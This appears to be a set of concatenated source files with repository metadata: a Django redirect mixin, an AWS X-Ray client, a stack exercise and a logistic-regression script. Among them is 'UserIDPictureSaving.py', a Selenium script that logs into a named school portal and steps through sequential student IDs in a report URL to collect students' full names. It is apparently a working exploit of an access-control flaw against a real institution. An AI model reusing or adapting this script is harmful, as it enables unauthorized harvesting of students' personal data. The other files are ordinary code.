on_delete=models.SET_NULL,
blank=True,
null=True,
related_name="+",
verbose_name=_("Redirect to page"),
)
class Meta:
abstract = True
def clean_fields(self, exclude=None):
"""
Ensure that redirects are configured properly.
"""
super(RedirectMixin, self).clean_fields(exclude)
if self.redirect_to_url and self.redirect_to_page_id:
raise validation_error(
_("Only set one redirect value."),
field="redirect_to_url",
exclude=exclude,
)
if self.redirect_to_page_id:
if self.redirect_to_page_id == self.pk:
raise validation_error(
_("Cannot redirect to self."),
field="redirect_to_page",
exclude=exclude,
)
if self.redirect_to_page.redirect_to_page_id:
raise validation_error(
_(
"Do not chain redirects. The selected page redirects"
" to %(title)s (%(path)s)."
)
% {
"title": self.redirect_to_page,
"path": self.redirect_to_page.get_absolute_url(),
},
field="redirect_to_page",
exclude=exclude,
)
if self.redirect_to_url or self.redirect_to_page_id:
# Any page redirects to this page?
other = self.__class__._default_manager.filter(redirect_to_page=self)
if other:
raise validation_error(
_(
"Do not chain redirects. The page %(page)s already"
" redirects to this page."
)
% {"page": ", ".join("%s" % page for page in other)},
field="redirect_to_page",
exclude=exclude,
)
| [
"mk@feinheit.ch"
] | mk@feinheit.ch |
f08bad40280e387f7a256b2948525a086e40bdc5 | 255c4794cfed32d3e7a4225de1db31b00679c932 | /UserIDPictureSaving.py | ebfe84846d4ba4d2bda0af5ecab182b8cc010aaf | [] | no_license | JPeterD/DSC-Vulnerabilities | fb1b179e9dbf2c3f3d57e1dc63dc6da071b74a93 | 7ac585c70b90a9a9362243f38e447675872568a2 | refs/heads/master | 2022-12-09T18:59:28.260614 | 2020-09-12T20:54:30 | 2020-09-12T20:54:30 | 295,024,322 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,574 | py | from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import Select
import urllib3
#Path to your chromedriver
pchromdriver = '/usr/lib/chromium-browser/chromedriver'
browser = webdriver.Chrome(executable_path = pchromdriver)
url = 'https://dsc.orbund.com/einstein-freshair/student_frameset.jsp'
browser.get(url)
username = browser.find_element_by_name("username")
password = browser.find_element_by_name("password")
user = ' ' # your username goes here
pw = ' ' # your password goes here
username.send_keys(user)
password.send_keys(pw)
select = Select(browser.find_element_by_name('role'))
#1 for student, 3 for instructor, 4 for admin, 6 for staff
select.select_by_value(' ')
browser.find_element_by_id("loginBtn").click()
#Crates text file studentnames.txt to store userid(for pictures) and Full Name
file = open("studentnames", "w")
#Starting Student ID to store
studentid = 15400
while(studentid < 15405): #Enter the ending student ID
url = 'https://dsc.orbund.com/einstein-freshair/print_progressreport.jsp?studentid='
trailing = '&semesterid=59&classid=12500&subjectid=11125&sortOrder=0&sortingColumn=testDate'
final_url = ''.join([url, str(studentid), trailing])
browser.get(final_url)
try:
student = browser.find_element_by_xpath("//html/body/table[1]/tbody/tr[3]/td[2]")
except:
print("This user does not exist")
studentid +=1
else:
student = student.text
file.write("\n" + student + " " + str(studentid))
studentid += 1
file.close()
browser.close() | [
"noreply@github.com"
] | JPeterD.noreply@github.com |
508bb4c1db151ac198819deeafd7f02c0c2081d2 | b176114c038e2e1babd1930f9c2cd5bfae759eac | /lib/aws/xray/client.py | 3e7ad5632afa9934707cac46be55d8e3a00d9bde | [] | no_license | Datenworks/xray2elasticsearch | 5a1828f70b86d924809c1cb0be3a7c482653fa76 | 2d52329a9d0655c5645f4799e7eb098a2db5af96 | refs/heads/master | 2022-12-11T15:43:05.913962 | 2020-09-11T17:51:58 | 2020-09-11T17:51:58 | 294,723,721 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,167 | py | import boto3
from datetime import datetime, timedelta
from lib import log
class XrayClient(object):
def __init__(self):
self.client = boto3.client('xray')
def get_trace_summaries(self,
start: datetime,
end: datetime,
filter_expression: str = 'ok or !ok',
next_token: str = ''):
return self.client\
.get_trace_summaries(StartTime=start,
EndTime=end,
FilterExpression=filter_expression,
NextToken=next_token)
def batch_get_traces(self, trace_ids: list):
return self.client.batch_get_traces(TraceIds=trace_ids)
def trace_by_id(self, trace_id: str):
return self.batch_get_traces(trace_ids=[trace_id])
def trace_ids_iterator(self,
start: datetime,
end: datetime,
filter_expr: str = 'ok or !ok'):
if not self.__less_than_24_hours(start, end):
end = start + timedelta(seconds=23*60*60)
response = self.get_trace_summaries(start=start,
end=end,
filter_expression=filter_expr)
next_token = response.get('NextToken', None)
while True:
summaries = response["TraceSummaries"]
log(f"Fetching {len(summaries)} trace summaries IDs")
for summary in summaries:
yield summary['Id']
if next_token is None:
break
summaries = self.get_trace_summaries(start=start,
end=end,
filter_expression=filter_expr,
next_token=next_token)
next_token = summaries.get('NextToken', None)
def __less_than_24_hours(self, start, end):
difference = end - start
return difference.total_seconds() < 24 * 60 * 60
| [
"richard.lopes@datenworks.com"
] | richard.lopes@datenworks.com |
ef12eac455fda006c09060cce2af4e26af2be958 | 383cc6bbed4d52d3c37723fcc52660c62698cc2e | /Exercise_2.py | d39db3375acca0fcc37932758b9a231e77c94c3d | [] | no_license | nikrasiya/PreCourse_1 | 44435af405c27f3dd5cee8832e6da2c0b4e95943 | e3f1d659e5574805a1d7ecf66d49027007c6dce1 | refs/heads/master | 2020-09-15T03:19:33.666707 | 2020-01-05T13:26:26 | 2020-01-05T13:26:26 | 223,335,958 | 0 | 0 | null | 2019-11-22T06:11:31 | 2019-11-22T06:11:29 | null | UTF-8 | Python | false | false | 2,505 | py | class Node:
def __init__(self, data):
self.data = data
self.next = None
def __str__(self):
return f'{self.data}'
class Stack:
'''
Time Complexity: Constant O(1)
Space Complexity: Constant O(1)
'''
def __init__(self):
self.top = None
self.stack_size = 0
'''
Time Complexity: Constant O(1)
Space Complexity: Constant O(1)
'''
def isEmpty(self):
return self.stack_size == 0
'''
Time Complexity: Constant O(1)
Space Complexity: Constant O(1)
'''
def push(self, data):
node = Node(data)
if self.top:
node.next = self.top
self.top = node
self.stack_size += 1
'''
Time Complexity: Constant O(1)
Space Complexity: Constant O(1)
'''
def pop(self):
if self.top:
data = self.top.data
if self.top.next:
self.top = self.top.next
else:
self.top = None
self.stack_size -= 1
return data
else:
return None
'''
Time Complexity: Constant O(1)
Space Complexity: Constant O(1)
'''
def peek(self):
return self.top.data if self.top else None
'''
Time Complexity: Constant O(1)
Space Complexity: Constant O(1)
'''
def size(self):
return self.stack_size
'''
Time Complexity: Linear O(n)
Space Complexity: Constant O(1)
'''
def show(self):
cur = self.top
result = ''
while cur:
result += f'{cur} '
cur = cur.next
return result
a_stack = Stack()
while True:
print('push <value>')
print('pop')
print('peek')
print('isEmpty')
print('show')
print('size')
print('quit')
do = input('What would you like to do? ').split()
operation = do[0].strip().lower()
if operation == 'push':
a_stack.push(int(do[1]))
elif operation == 'pop':
popped = a_stack.pop()
if popped is None:
print('Stack is empty.')
else:
print('Popped value: ', int(popped))
elif operation == 'isempty':
print(a_stack.isEmpty())
elif operation == 'peek':
print(a_stack.peek())
elif operation == 'show':
print(a_stack.show())
elif operation == 'size':
print(a_stack.size())
elif operation == 'quit':
break
| [
"noreply@github.com"
] | nikrasiya.noreply@github.com |
cc1bf5a3a967c4792c02aa5ab55641dc928afbf9 | 9ede69f65681a2d75d74919bddbaef2b50c20e18 | /LogisticReal.py | 3f6bbc7764967ca9e2da4cadd4d413fa3aba89e3 | [] | no_license | DarcyMyers/maclearn | b30fa8c9ab9375e7055bfee8b629201eceb3aa0c | 2275b5b6fface75b9c1007183cb72eb27b31976b | refs/heads/master | 2021-01-13T07:16:46.263997 | 2016-08-29T01:42:04 | 2016-08-29T01:42:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,541 | py | from collections import OrderedDict
import copy
import numpy
from numpy import mean
import pandas
from pandas import DataFrame
from pandas import Series
import scipy
import sklearn
import sklearn.cross_validation
from sklearn.cross_validation import ShuffleSplit
import sklearn.feature_selection
import sklearn.linear_model
import sklearn.pipeline
import MaclearnUtilities
from MaclearnUtilities import bhfdr
from MaclearnUtilities import colcor
import RestrictedData
xs = RestrictedData.xs
xnorms = RestrictedData.xnorms
annots = RestrictedData.annots
ys = RestrictedData.ys
ynums = RestrictedData.ynums
cvSchedules = {k : ShuffleSplit(len(ys[k]),
n_iter = 5,
test_size = 0.2,
random_state = 123)
for k in xnorms}
def pandaize(f):
def pandaized(estimator, X, y, **kwargs):
return f(estimator, array(X), y, **kwargs)
return pandaized
@pandaize
def cross_val_score_pd(estimator, X, y, **kwargs):
return sklearn.cross_validation.cross_val_score(
estimator, X, y, **kwargs)
def fitModelWithNFeat(fitter, n, setname, cv=None):
if cv is None:
cv = cvSchedules[setname]
if n > xnorms[setname].shape[1]:
return None
fsFitter = sklearn.pipeline.Pipeline([
('featsel', sklearn.feature_selection.SelectKBest(
sklearn.feature_selection.f_regression, k=n)),
('classifier', fitter)
])
return mean(cross_val_score_pd(estimator = fsFitter,
X = xnorms[setname],
y = ynums[setname],
cv = cv))
def accPlot(accsByNFeats):
ax = plt.subplot(111)
for s in accsByNFeats:
plotdata = pandas.concat([DataFrame({"p" : p,
"acc" : accsByNFeats[s][p]},
index = [str(p)])
for p in accsByNFeats[s]],
axis = 0)
plotdata.plot(x = "p",
y = "acc",
ax = ax,
logx = True,
label = s)
nFeatures = [2, 5, 10, 20, 50, 100, 200, 500,
1000, 2000, 5000, 10000]
## -----------------------------------------------------------------
## no (err...very little) regularization
## -----------------------------------------------------------------
def fitLogisticWithNFeat(**kwargs):
fitter = sklearn.linear_model.LogisticRegression(
penalty="l2", C=1e10)
return fitModelWithNFeat(fitter=fitter, **kwargs)
nFeatNoReg = [2, 5, 10, 20, 50, 100, 200]
accsByNFeats = OrderedDict([(s,
OrderedDict([(
n,
fitLogisticWithNFeat(n=n, setname=s))
for n in nFeatNoReg]))
for s in xnorms])
for s in accsByNFeats:
for n in accsByNFeats[s]:
if n > xnorms[s].shape[0]:
accsByNFeats[s][n] = None
plt.clf()
accPlot(accsByNFeats)
## -----------------------------------------------------------------
## L2 regularization
## -----------------------------------------------------------------
def fitL2LogisticWithNFeat(**kwargs):
fitter = sklearn.linear_model.LogisticRegression(
penalty="l2", C=1)
return fitModelWithNFeat(fitter=fitter, **kwargs)
accsByNFeatsL2 = OrderedDict([(s,
OrderedDict([(
n,
fitL2LogisticWithNFeat(n=n, setname=s))
for n in nFeatures]))
for s in xnorms])
plt.clf()
accPlot(accsByNFeatsL2)
## -----------------------------------------------------------------
## L1 regularization
## -----------------------------------------------------------------
def fitL1LogisticWithNFeat(**kwargs):
fitter = sklearn.linear_model.LogisticRegression(
penalty="l1", C=1)
return fitModelWithNFeat(fitter=fitter, **kwargs)
accsByNFeatsL1 = OrderedDict([(s,
OrderedDict([(
n,
fitL1LogisticWithNFeat(n=n, setname=s))
for n in nFeatures]))
for s in xnorms])
plt.clf()
accPlot(accsByNFeatsL1)
| [
"denniscwylie@users.noreply.github.com"
] | denniscwylie@users.noreply.github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.